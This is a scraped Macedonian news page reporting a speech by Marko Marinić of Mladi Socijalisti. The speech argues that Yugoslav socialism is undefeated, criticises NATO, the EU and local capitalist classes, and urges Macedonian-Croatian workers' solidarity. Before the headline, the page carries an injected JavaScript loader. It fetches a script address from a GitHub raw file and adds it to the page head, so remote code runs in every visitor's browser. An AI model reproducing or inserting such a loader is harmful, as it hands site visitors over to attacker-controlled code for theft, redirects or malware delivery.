;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Мариниќ: Југословенскиот социјализам не е поразен, доказ за тоа е солидарноста на нашите партии - Антропол
АктуелноЛокалноНастани

Мариниќ: Југословенскиот социјализам не е поразен, доказ за тоа е солидарноста на нашите партии

  • Говор на Марко Мариниќ, претставник на Mladi Socijalisti

Сведоци сме на големите интереси од страна на западните капиталистички структури во нашите земји, што се осликува во постепеното завземање на директна контрола од страна на НАТО и ЕУ врз државните процеси, особено во доменот на надворешната политика. Надвор од Балканот, тој процес има ист облик и во средна и источна Европа – недемократска асимилација на бившите социјалистички земји под надлежност на западните хегемонски структури.

Оваа ситуација дополнително се влоши со спроведувањето на интересите на домашните буржоаски класи, односно со олицетворението на идејата за антикомунизам во идејата за антијугословенизмот – со што се негираат сите успеси и зафати на Југословенското социјалистичко движење.

Понатаму, несомнено е дека општествено најсвесната генерација во секоја историска епоха се младите луѓе. Според тоа, еден од главните јавни интереси на буржоазијата е ширењето на нејзината идеологија меѓу нив, манифестирана во сè поизразената реакционерна тенденција на младите во служба на капиталот. Сведоци сме на постепен, но забележлив подем на фашистички организирани групи слични на она што се гледаше на почетокот на минатиот век, а истата струја ќе се стреми во наредните години, користејќи државна репресија, во име на капиталистичката структура да обезбеди вечно непречен проток на капитал кон неговите извори на Запад.

Но, знаеме дека тоа нема да се случи и знаеме дека југословенскиот социјализам се уште не е поразен – доказ е постоењето и солидарноста на нашите партии. Згора на тоа, можеме со сигурност да тврдиме дека улогата на работничката класа на нашите периферни земји ќе има значајна улога во конфликтот меѓу глобалниот Југ и Северот, а токму во тоа лежи и важноста на соработката на македонското и хрватското работничко движење. Преку заедничко дејствување, организација и широка солидарност, ние сме во состојба позитивно да ги поддржиме не само нашите индивидуални борби, туку и перцепцијата за односите меѓу нашите народи.